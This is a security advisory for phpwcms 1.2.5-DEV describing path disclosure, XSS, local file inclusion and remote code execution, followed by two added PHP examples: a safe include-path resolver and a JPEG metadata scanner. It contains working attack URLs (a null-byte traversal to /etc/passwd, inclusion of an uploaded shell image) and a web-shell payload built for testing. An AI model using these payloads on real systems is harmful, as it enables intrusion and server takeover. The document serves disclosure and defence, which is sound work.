Vendor: http://www.phpwcms.de
Bugs: Path Disclosure, XSS, Local File Inclusion, Remote Code Execution
Vulnerable Version: phpwcms 1.2.5-DEV (prior versions may also be affected)
Exploitation: Remote with browser

Description:
--------------------
phpwcms is a web content management system optimized for fast and easy setup on any standard web server. phpwcms is aimed at professional, public and private users.

Vulnerability:
--------------------

-->>Path Disclosure<<--
Reason: Direct access to include files generates a PHP error that reveals the installation path. Several files are affected; two examples:
Example:
http://example.com/phpwcms/include/inc_lib/files.public-userroot.inc.php
http://example.com/phpwcms/include/inc_lib/files.private.additions.inc.php

-->>XSS<<--
Reason: When register_globals is enabled, several template files echo request-supplied variables without encoding, so they are vulnerable to cross-site scripting. With register_globals on, the template array $BL can be populated straight from the query string, as in the example.
Example:
http://localhost/php/phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be_cnt_plainhtml]=
Code Snippet: /include/inc_tmpl/content/cnt6.inc.php //line#28

-->>Local File Inclusion<<--
Reason: Incorrect use of the bundled SPAW editor script (an external component) and its configuration results in local file inclusion when register_globals is enabled and magic_quotes_gpc is Off. The only check on $spaw_root rejects values containing "://" (remote URL wrappers); it does nothing about "../" traversal, and the trailing %00 (null byte) truncates the path so that the hard-coded "config/spaw_control.config.php" suffix is never appended. With magic_quotes_gpc On the null byte would be escaped and the truncation would fail.
Example:
http://localhost/php/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../../etc/passwd%00
Code Snippet: /include/inc_ext/spaw/spaw_control.class.php //lines:#15-20

if (preg_match("/:\/\//i", $spaw_root)) die ("can't include external file"); // only rejects "://", nothing else
include $spaw_root.'config/spaw_control.config.php'; // under register_globals, $spaw_root can come straight from the query string
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

-->>Remote Code Execution<<--
Reason: An attacker can upload a picture whose EXIF metadata contains PHP code in a post (include() ignores the file extension and executes any PHP open tag found in the bytes) and then use the local file inclusion above to have the uploaded file included, resulting in remote code execution.
Example:
http://example.com/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../picture/upload/shell.jpg%00

Solution:
--------------------
Vendor has been contacted but we are not aware of any vendor-supplied patch. Until one is available, turning register_globals off removes the XSS, LFI and RCE vectors described above, and blocking direct web access to the include/ directory removes the path disclosure.

Original Advisories:
--------------------
http://www.kapda.ir/advisory-331.html
In Farsi: http://irannetjob.com/

Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
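Added example (not part of the original advisory and not phpwcms or SPAW code): how the spaw_root directory should be resolved so that both payloads above are rejected. It replaces the "://" regex with a null-byte check, realpath() canonicalisation and a hypothetical allowlist of root directories; the function name, the allowlist and the temporary directory layout built for the demonstration are the example's own assumptions, and it needs PHP 7.1 or later.

```php
<?php
// Added example, not phpwcms or SPAW code: resolve the editor root safely.
// The original check only rejects values containing "://" (remote wrappers). It does
// nothing about "../" traversal, and a %00 null byte (magic_quotes_gpc=Off) truncates the
// path before the hard-coded 'config/spaw_control.config.php' suffix is appended.
declare(strict_types=1);

/**
 * Return the canonical directory (with trailing slash) to include from, or null if
 * $requested is unsafe. $requested models the attacker-influenced value; $allowedRoots is a
 * hypothetical allowlist of real directories. The real fix is to never read this value from
 * the request at all, but these are the checks a configurable root needs.
 */
function resolve_spaw_root(string $requested, array $allowedRoots): ?string
{
    // A null byte is never part of a legitimate directory name (realpath() throws on it in PHP 8).
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Keep the original wrapper check (php://, http://, data:// ...).
    if (preg_match('#://#i', $requested)) {
        return null;
    }
    // Canonicalise: resolves "..", symlinks; false when the path does not exist.
    $real = realpath($requested);
    if ($real === false || !is_dir($real)) {
        return null;
    }
    $real = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Accept only a directory equal to or inside one of the allowed roots.
    foreach ($allowedRoots as $root) {
        $rootReal = realpath($root);
        if ($rootReal === false) {
            continue;
        }
        $rootReal = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $rootReal, strlen($rootReal)) === 0) {
            return $real;
        }
    }
    return null;
}

// Demonstration on a temporary directory layout constructed for this example.
$base = sys_get_temp_dir() . '/spaw_demo_' . getmypid();
mkdir("$base/spaw/config", 0700, true);
mkdir("$base/picture/upload", 0700, true);
file_put_contents("$base/spaw/config/spaw_control.config.php", "<?php // stub\n");
file_put_contents("$base/picture/upload/shell.jpg", "\xFF\xD8<?php phpinfo(); ?>\xFF\xD9");

$allowed = ["$base/spaw"];
$cases = [
    "$base/spaw/",                          // the only legitimate value
    "../../../../etc/passwd\0",             // advisory payload 1 (%00 decoded to a null byte)
    "$base/picture/upload/shell.jpg\0",     // advisory payload 2 (uploaded image as PHP)
    "$base/picture/upload/shell.jpg",       // same target without the null byte: a file, not a directory
    "$base/picture/upload/",                // real directory, but outside the allowlist
    'http://evil.example/',                 // caught by the original "://" check
];
foreach ($cases as $c) {
    $r = resolve_spaw_root($c, $allowed);
    printf("%-60s => %s\n", addcslashes($c, "\0"), $r === null ? 'REJECTED' : "include from $r");
}
// Only the first case is accepted, so the original include line
//     include $spaw_root.'config/spaw_control.config.php';
// can only ever reach a real file under the allowed root.

// Clean up the demo layout.
unlink("$base/spaw/config/spaw_control.config.php");
unlink("$base/picture/upload/shell.jpg");
foreach (["$base/spaw/config", "$base/spaw", "$base/picture/upload", "$base/picture", $base] as $d) {
    rmdir($d);
}
```

The order of the checks matters: the null byte is rejected before realpath() sees it, and the allowlist comparison is done on canonical paths with a trailing separator so that a sibling directory with a matching prefix (for example "spaw2") cannot slip past a plain string prefix test.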
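A second added example, likewise not from the advisory or the project: a check for the precondition of the RCE above, walking the marker segments of an uploaded JPEG and flagging a PHP open tag inside metadata (APPn or COM segments) or in trailing data after the image. The two sample files are constructed inline (the Exif-tagged APP1 body is not a real TIFF/IFD structure), and the function names and the regular expression are the example's own.

```php
<?php
// Added example, not phpwcms or SPAW code: detect the RCE precondition from the advisory.
// include() ignores the .jpg extension and executes any PHP open tag found in the bytes,
// so an upload is checked segment by segment for such a tag in its metadata.
declare(strict_types=1);

// <?php, <?= or "<? " followed by whitespace; deliberately not "<?xpacket", the XMP header.
const PHP_OPEN_TAG_RE = '/<\?(?:php\b|=|\s)/i';

/**
 * Walk the JPEG marker segments of $bytes and return the offending ones as
 * [location => snippet]; an empty array means nothing was found. Metadata segments are
 * APP0..APP15 (0xE0-0xEF) and COM (0xFE). Parsing stops at SOS (0xDA), where entropy-coded
 * data begins; everything from there on is checked with a plain byte scan.
 */
function jpeg_php_segments(string $bytes): array
{
    $hits = [];
    $len  = strlen($bytes);
    if ($len < 4 || substr($bytes, 0, 2) !== "\xFF\xD8") {
        return ['format' => 'not a JPEG (missing SOI)'];
    }
    $pos = 2;
    while ($pos + 4 <= $len) {
        if (ord($bytes[$pos]) !== 0xFF) {
            $hits['format'] = "marker expected at offset $pos";
            break;
        }
        $marker = ord($bytes[$pos + 1]);
        if ($marker === 0xD9) {            // EOI
            $pos += 2;
            break;
        }
        if ($marker === 0xDA) {            // SOS: image data follows
            break;
        }
        $segLen = unpack('n', substr($bytes, $pos + 2, 2))[1];
        if ($segLen < 2 || $pos + 2 + $segLen > $len) {
            $hits['format'] = "bad segment length at offset $pos";
            break;
        }
        $body   = substr($bytes, $pos + 4, $segLen - 2);
        $isMeta = ($marker >= 0xE0 && $marker <= 0xEF) || $marker === 0xFE;
        if ($isMeta && preg_match(PHP_OPEN_TAG_RE, $body, $m, PREG_OFFSET_CAPTURE)) {
            $hits[sprintf('segment 0x%02X @%d', $marker, $pos)] = substr($body, $m[0][1], 40);
        }
        $pos += 2 + $segLen;
    }
    // Trailing data after SOS/EOI is a classic place to hide a payload.
    $tail = substr($bytes, $pos);
    if ($tail !== '' && preg_match(PHP_OPEN_TAG_RE, $tail, $m, PREG_OFFSET_CAPTURE)) {
        $hits['trailing @' . ($pos + $m[0][1])] = substr($tail, $m[0][1], 40);
    }
    return $hits;
}

/** Build one marker segment: 0xFF, marker, big-endian length (including itself), body. */
function jpeg_segment(int $marker, string $body): string
{
    return "\xFF" . chr($marker) . pack('n', strlen($body) + 2) . $body;
}

// Constructed sample files, not real uploads. Both start with a valid SOI/APP0 header, so a
// magic-byte check accepts them; only the metadata differs.
$jfif  = "JFIF\0\x01\x01\0\0\x01\0\x01\0\0";
$clean = "\xFF\xD8" . jpeg_segment(0xE0, $jfif) . jpeg_segment(0xFE, 'harmless comment') . "\xFF\xD9";
$evil  = "\xFF\xD8"
       . jpeg_segment(0xE0, $jfif)
       // Exif-tagged APP1 body (constructed, not a real TIFF/IFD structure)
       . jpeg_segment(0xE1, "Exif\0\0" . 'ImageDescription=<?php system($_GET["c"]); ?>')
       . "\xFF\xD9";

foreach (['clean.jpg' => $clean, 'shell.jpg' => $evil] as $name => $file) {
    $hits = jpeg_php_segments($file);
    echo $name, ': ', $hits === [] ? 'ok' : 'REJECT ' . json_encode($hits), "\n";
}
```

This is defence in depth, not the fix: the include itself must be closed, because a payload can also sit in the entropy-coded region (caught here only if it follows SOS) or in a non-JPEG upload. Re-encoding every upload with an image library discards all metadata and is the stronger control where it is available.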